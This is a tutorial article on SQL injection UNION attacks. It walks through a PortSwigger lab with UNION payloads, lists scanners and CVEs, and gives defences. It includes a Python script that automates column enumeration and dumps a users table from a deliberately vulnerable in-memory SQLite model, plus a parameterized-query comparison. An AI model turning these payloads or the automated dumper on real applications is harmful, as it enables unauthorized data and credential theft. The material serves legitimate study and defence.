20 Feb 2024

SQL injection UNION attack

A SQL injection UNION attack is a way of exploiting a SQL injection vulnerability: the attacker appends a second SELECT to the application’s original query using the SQL UNION operator, which combines the result sets of two or more SELECT statements into one. Because the appended SELECT can name any table the application’s database account can read, its rows come back through the same page that normally shows the legitimate results. The attack is used to extract data the attacker is not authorized to see, such as usernames, password hashes, or other records.

The attack works by manipulating input to a web application (form fields, URL parameters, cookies, HTTP headers) that ends up inside a SQL query. If the application builds the query by concatenating that input instead of passing it as a bound parameter, the attacker can terminate the intended value and append a crafted SELECT with UNION. For the combined query to run, the appended SELECT must return the same number of columns as the original, with compatible data types; once it does, the database executes the combined statement and the attacker reads data from other tables in the results.

This type of attack is particularly dangerous because it can lead to unauthorized access to sensitive data, compromise of user accounts, and potentially full control over the database.

Exploitation examples

To gain a deeper understanding of SQL injection using the UNION operator, consider a practical exercise provided by PortSwigger, which is renowned for its expertise in web security. This exercise focuses on a SQL injection vulnerability in a product category filter. The vulnerability allows the injection of a UNION-based query, which can combine results from multiple tables within the database.

The goal of this lab is to craft a UNION attack to fetch data from a different table. To achieve this, one must first establish the number of columns the original query returns. The next step is to identify which of these columns can hold string data.

To complete the lab, one must successfully manipulate the query to return an additional row containing a certain value provided by the lab.

Let’s start by looking at the filter request on the site.

Let’s send this request to Repeater so we can comfortably look at the request and response. First let’s determine how many columns the original query returns. We do this with the payload ' UNION SELECT NULL,NULL,NULL--, where each NULL stands for one column. NULL is used because it is compatible with every column type: if the number of NULLs does not match, the database raises an error and the page fails; when it matches, the page renders normally.

We have established that the original query returns 3 columns; now let’s find which of them hold string data. We will do this with the query ' UNION SELECT '123','123','123'--. A less ambiguous probe is a non-numeric marker string in one column at a time, with NULL in the others, because some databases will coerce '123' into an integer column and the probe then appears to succeed everywhere.

Ok, now let’s complete the lab by making the query return the string ‘XyQQQCk’. The payload is ' UNION SELECT NULL,'XyQQQCk',NULL--: the string goes in the second column, the one that accepted text in the previous step, and NULL fills the others.

Scanners that detect vulnerabilities

  1. OWASP ZAP (Zed Attack Proxy): An open-source web application security scanner that can find a wide range of security vulnerabilities, including SQL injection.

  2. SQLMap: An open-source penetration-testing tool that automates detecting and exploiting SQL injection flaws, including UNION-based extraction, and taking over database servers.

  3. Burp Suite: An integrated platform for security testing of web applications. It includes both automated scanning and manual testing tools (Repeater, used in the walkthrough above, is one of them) that can be used to detect SQL injection vulnerabilities.

  4. Acunetix: A fully automated web vulnerability scanner that can detect and report on a variety of vulnerabilities, including all types of SQL Injection.

  5. Netsparker (now Invicti): An easy-to-use web application security scanner that can automatically find SQL injection, XSS, and other vulnerabilities in your web applications and web services.

  6. Veracode: Provides automated static and dynamic analysis to identify and remediate vulnerabilities, including SQL injection.

  7. AppScan: Originally an IBM product, now maintained by HCL, providing automated security testing tools that can identify and manage vulnerabilities for web, mobile, and desktop applications.

  8. w3af: An open-source web application security scanner which allows users to find and exploit several security vulnerabilities.

Average CVSS score for SQL injection UNION attack

The Common Vulnerability Scoring System (CVSS) provides a way to capture the principal characteristics of a security vulnerability and produce a numerical score reflecting its severity. The numerical score can then be translated into a qualitative representation (such as low, medium, high, and critical) to help organizations properly assess and prioritize their vulnerability management processes.

For SQL injection, including UNION-based exploitation, the CVSS score is usually high because the attacker can read, modify, or delete sensitive data and sometimes run administrative operations on the database. A SQL injection reachable over the network without authentication typically scores 7.5 under CVSS 3.x when only confidentiality is affected, and 9.8, in the “critical” band, when confidentiality, integrity and availability are all rated high.

The actual score can vary based on several factors outlined in the CVSS, such as:

Attack Vector (AV): How the vulnerability is exploited (e.g., network, adjacent network, local, physical).

Attack Complexity (AC): The complexity of the attack required to exploit the vulnerability.

Privileges Required (PR): The level of privileges an attacker must possess before successfully exploiting the vulnerability.

User Interaction (UI): Whether the vulnerability requires user interaction to be exploited.

Scope (S): Whether a successful exploit impacts resources beyond the scope of the vulnerable component.

Confidentiality (C): Impact on the confidentiality of the system.

Integrity (I): Impact on the integrity of the system.

Availability (A): Impact on the availability of the system.

A current average for SQL injection vulnerabilities would have to be computed from a vulnerability database that aggregates reported scores, such as the National Vulnerability Database (NVD); this article does not attempt that.

Averages are also of limited use: each vulnerability is scored on its own details, and the number only means something in the context of the affected system and its environment.

CVEs related to SQL injection UNION attack

CVE-2021-37593 had a medium base score of 6.4 on the CVSS 2.0 scale. It was related to PEEL Shopping, where a remote SQL injection allowed unauthenticated users to affect the execution of predefined SQL commands (NVD).

CVE-2021-43408 was associated with the “Duplicate Post” WordPress plugin and had a high CVSS 2.0 score of 9.0, indicating that an exploit could result in a complete compromise of confidentiality, integrity, and availability (NVD).

CVE-2022-24124 targeted Casdoor before version 1.13.1 and had a CVSS 3.1 base score of 7.5, marking it as high severity. The vulnerability could be exploited to dump sensitive files like /etc/passwd (Qualys Security Blog).

CVE-2021-1225 was reported in the web-based management interface of Cisco SD-WAN vManage Software and had a critical CVSS 3.x base score of 9.1. This vulnerability could allow an unauthenticated, remote attacker to conduct SQL injection attacks (NVD).

CVE-2023-34362 is the SQL injection in Progress MOVEit Transfer that was exploited in the wild in 2023. The Unit 42 (Palo Alto Networks) write-up cited here gives no CVSS score; NVD rates it 9.8, critical. Recommendations include disabling HTTP/HTTPS traffic to the server until the relevant patches are applied.

CVE-2020-12271 is a pre-authentication SQL injection in the administration interface and user portal of Sophos XG Firewall devices, exploited in the wild in April 2020. It is listed in CISA’s Known Exploited Vulnerabilities Catalog, which requires applying updates per vendor instructions (NVD).

CVE-2019-5110 had a high CVSS 3.x base score of 8.8 and was reported in Forma LMS 2.2.1, where specially crafted web requests could cause SQL injections (NVD).

CVE-2022-3323 with a high CVSS 3.1 base score of 7.5 was found in Advantech iView, where a remote attacker could exploit a vulnerability to retrieve the iView admin password (NVD).

How to study SQL injection UNION attacks

To study SQL injection UNION attacks, you can dive into resources that explain the mechanics of the attack, how it’s executed, and ways to prevent it. Union SQL injection is a type of attack that extends the results returned by an original query, potentially exposing sensitive information from the database. The key to a successful UNION attack is that the malicious SELECT returns the same number of columns as the original query, with compatible data types; both can be determined with the techniques below.

One common method to determine the number of columns used by the original query is to inject ORDER BY clauses with an increasing column index until an error occurs, which indicates you’ve exceeded the actual number of columns; the last index that worked is the count. Another approach is the UNION SELECT technique: append a SELECT of NULL values, starting with one NULL and adding one at a time until the database stops returning an error. At that point the number of NULLs matches the number of columns in the original query (NULL is used because it is compatible with every data type).

Once you know the number of columns, you can test which columns can handle string data by injecting a string into each column one at a time using UNION SELECT, with NULL in the remaining columns. If the application’s response includes the injected string, that column can be used to retrieve string data.

These techniques are fundamental to understanding and performing SQL injection UNION attacks in a controlled lab environment, such as the ones provided by web security learning platforms. PortSwigger’s Web Security Academy is a notable resource where you can learn about and practice these techniques in a safe and legal setting. Additionally, for a broader view of UNION SQL injection and tips for prevention, Bright Security offers insights and a comparison of UNION-based and error-based SQLi, detailing how each attack works and how to prevent it.
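
The lab walkthrough above and the column-counting techniques just described, as a runnable model written for this article (it is not the PortSwigger lab’s code): a small in-memory SQLite database with constructed product and user tables, a handler that builds its query by string concatenation, and the three enumeration steps automated against it. The schema, the sample rows and the handler’s number formatting are assumptions; in particular, SQLite does not reject text in a numeric column the way PostgreSQL or Oracle do, so the type mismatch that the lab surfaces as a database error is modeled here by the handler formatting id and price as numbers.

```python
"""Added example (not the PortSwigger lab's code): the UNION enumeration
procedure run against a small model of a vulnerable product-category filter.
Schema, sample rows and the rendering logic are assumptions for this example."""
import sqlite3

# Anything the handler fails on becomes a generic error page.
HANDLER_FAILURES = (sqlite3.Error, TypeError, ValueError)


def build_db() -> sqlite3.Connection:
    """In-memory database with constructed sample data."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price INTEGER, category TEXT);
        INSERT INTO products VALUES (1, 'Lamp', 20, 'Gifts'), (2, 'Leash', 15, 'Pets');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 'hunter2'), ('wiener', 'peter');
    """)
    return db


def filter_products(db, category: str):
    """The vulnerable query: the category parameter is concatenated into SQL."""
    sql = f"SELECT id, name, price FROM products WHERE category = '{category}'"
    return db.execute(sql).fetchall()


def fmt_int(v):
    return "" if v is None else str(int(v))      # text here raises ValueError


def fmt_money(v):
    return "" if v is None else f"${float(v):.2f}"


def render(db, category: str):
    """Model of the HTTP handler: returns (status, body). Numeric columns are
    formatted as numbers, so a string landing in them fails the request,
    which stands in for the database type error real engines would raise."""
    try:
        rows = filter_products(db, category)
        lines = [f"{fmt_int(r[0])}|{r[1] or ''}|{fmt_money(r[2])}" for r in rows]
        return 200, "\n".join(lines)
    except HANDLER_FAILURES:
        return 500, "Internal Server Error"


def find_column_count_union(db, max_cols=10):
    """Step 1a: add NULLs to the UNION until the request stops failing."""
    for n in range(1, max_cols + 1):
        status, _ = render(db, "' UNION SELECT " + ",".join(["NULL"] * n) + "--")
        if status == 200:
            return n
    return None


def find_column_count_order_by(db, max_cols=10):
    """Step 1b: ORDER BY n fails once n exceeds the column count."""
    for n in range(1, max_cols + 1):
        status, _ = render(db, f"' ORDER BY {n}--")
        if status != 200:
            return n - 1
    return None


def find_string_columns(db, ncols, marker="qwzxv"):
    """Step 2: a marker string in one column at a time, NULL elsewhere.
    A digit-only marker such as '123' can be coerced into a numeric column
    and would report a false positive; use letters."""
    hits = []
    for i in range(ncols):
        cols = ["NULL"] * ncols
        cols[i] = f"'{marker}'"
        status, body = render(db, "' UNION SELECT " + ",".join(cols) + "--")
        if status == 200 and marker in body:
            hits.append(i)
    return hits


def dump_users(db, ncols, text_col):
    """Step 3: pull username:password pairs through the text column."""
    cols = ["NULL"] * ncols
    cols[text_col] = "username || ':' || password"
    status, body = render(db, "' UNION SELECT " + ",".join(cols) + " FROM users--")
    if status != 200:
        return []
    creds = []
    for line in body.splitlines():
        field = line.split("|")[text_col]
        if ":" in field:
            creds.append(field)
    return sorted(creds)


if __name__ == "__main__":
    db = build_db()
    n = find_column_count_union(db)
    print("columns:", n, "ORDER BY agrees:", find_column_count_order_by(db) == n)
    text_cols = find_string_columns(db, n)
    print("text columns:", text_cols)
    print("lab value returned:", "XyQQQCk" in render(db, "' UNION SELECT NULL,'XyQQQCk',NULL--")[1])
    print("dumped:", dump_users(db, n, text_cols[0]))
```

Run directly, it reports 3 columns, identifies column index 1 (name) as the only one that carries text, returns the lab-style value XyQQQCk through it, and dumps the users table. Calling `find_string_columns(db, 3, marker="123")` instead reports all three columns, which is the false positive the walkthrough’s '123' probe is exposed to.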

How to protect against SQL injection UNION attacks

  1. Instead of building SQL queries by concatenating user input, use prepared statements (parameterized queries) with placeholders for data. The query structure is parsed first and the values are bound afterwards, so the database never interprets user input as SQL, whatever it contains.

  2. Stored procedures can safeguard against SQL injection, but only if they are written correctly: a procedure that builds dynamic SQL from its arguments has the same flaw as concatenation in application code.

  3. Validate user inputs to ensure they conform to expected formats, using regular expressions or, where a field has a known set of values such as a product category, an allow-list of acceptable values.

  4. If prepared statements are genuinely not possible, escape all user-supplied input with the escaping routine of the database driver in use. Treat this as a last resort: escaping is specific to the database and to the context the value is used in, and a mismatch leaves the injection open.

  5. Object-Relational Mapping (ORM) libraries are not impervious to SQL injection, but they can abstract the SQL generation process and reduce the likelihood of injection.

  6. Ensure that the database account used by the web application has the least privileges necessary. This can limit what an attacker can do if they exploit a SQL injection flaw.

  7. Use custom error messages for users, which prevent attackers from learning about the structure of your database through error messages.

  8. Keep your database management system (DBMS) and all your platforms updated with the latest patches.

  9. Regularly test your web applications using both static and dynamic application security testing tools to find and fix vulnerabilities.

  10. Deploy WAFs to help identify and block SQL injection attacks, including those that use the UNION operator, by inspecting incoming traffic and filtering out malicious SQL. A WAF is a defence-in-depth layer rather than a fix: UNION payloads can often be obfuscated past signature rules, so parameterized queries remain the primary control.

  11. Implement effective monitoring to detect unusual database activities that could indicate a SQL injection attack.
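
Items 1 and 3 above side by side, as an added example that is not code from the article: the same category filter built by concatenation, with a bound parameter, and with an allow-list in front of the bound parameter. The table layout, the category list and the sample rows are assumptions made for the example; the payload is the UNION query from the walkthrough aimed at a users table.

```python
"""Added example (not from the original article): one category filter built
three ways, against a constructed SQLite database."""
import sqlite3

# The attacker's UNION payload from the walkthrough, aimed at a users table.
PAYLOAD = "' UNION SELECT NULL, username || ':' || password, NULL FROM users--"

# Allow-list for a field with a known set of values (assumed for the example).
ALLOWED_CATEGORIES = frozenset({"Gifts", "Pets", "Tech"})


def build_db() -> sqlite3.Connection:
    """In-memory database with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price INTEGER, category TEXT);
        INSERT INTO products VALUES (1, 'Lamp', 20, 'Gifts'), (2, 'Leash', 15, 'Pets');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 'hunter2');
    """)
    return db


def filter_vulnerable(db, category: str):
    """String concatenation: the input becomes part of the SQL text."""
    return db.execute(
        f"SELECT id, name, price FROM products WHERE category = '{category}'"
    ).fetchall()


def filter_parameterized(db, category: str):
    """Prepared statement: the statement is parsed with '?' in place, then the
    value is bound, so the database compares against one string and never
    sees a second SELECT."""
    return db.execute(
        "SELECT id, name, price FROM products WHERE category = ?", (category,)
    ).fetchall()


def is_valid_category(category: str) -> bool:
    """Allow-list validation: anything outside the known set is rejected."""
    return category in ALLOWED_CATEGORIES


def filter_validated(db, category: str):
    """Validation in front of the parameterized query; the rejection message
    deliberately says nothing about the database (item 7 above)."""
    if not is_valid_category(category):
        raise ValueError("unknown category")
    return filter_parameterized(db, category)


def leaked_credentials(rows):
    """Rows whose name column carries a user:password pair (attack result)."""
    return sorted(r[1] for r in rows if r[1] and ":" in r[1])


if __name__ == "__main__":
    db = build_db()
    print("concatenation leaks:", leaked_credentials(filter_vulnerable(db, PAYLOAD)))
    print("parameterized returns:", filter_parameterized(db, PAYLOAD))
    print("allow-list accepts payload:", is_valid_category(PAYLOAD))
```

The concatenated version returns the administrator’s credentials for the payload, the parameterized version returns no rows because the whole payload is treated as a category name, and the allow-list never lets the payload reach the database at all.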


In conclusion, the threat posed by SQL injection UNION attacks is a stark reminder of the critical need for robust security practices in web application development and maintenance. Through a combination of rigorous input validation, the implementation of parameterized queries, and the deployment of web application firewalls, developers and administrators can fortify their defenses against such intrusions.

This article has outlined not only the mechanics of the UNION attack but also practical solutions to mitigate the risk. The real-world examples and CVEs discussed serve as a testament to the potential impact of such vulnerabilities and the importance of continual vigilance.

As the landscape of cyber threats evolves, the responsibility to protect sensitive data becomes ever more pressing. By adopting a proactive approach to security, informed by the latest research and utilizing cutting-edge tools, organizations can significantly reduce their exposure to SQL injection attacks.

Remember, security is not a one-time setup but a dynamic, ongoing process. Regular updates, patches, and security training form the bedrock of a secure web environment. In the end, a commitment to security is a commitment to the trust of your users and the integrity of your systems. Stay informed, stay vigilant, and prioritize security in every aspect of your digital presence.
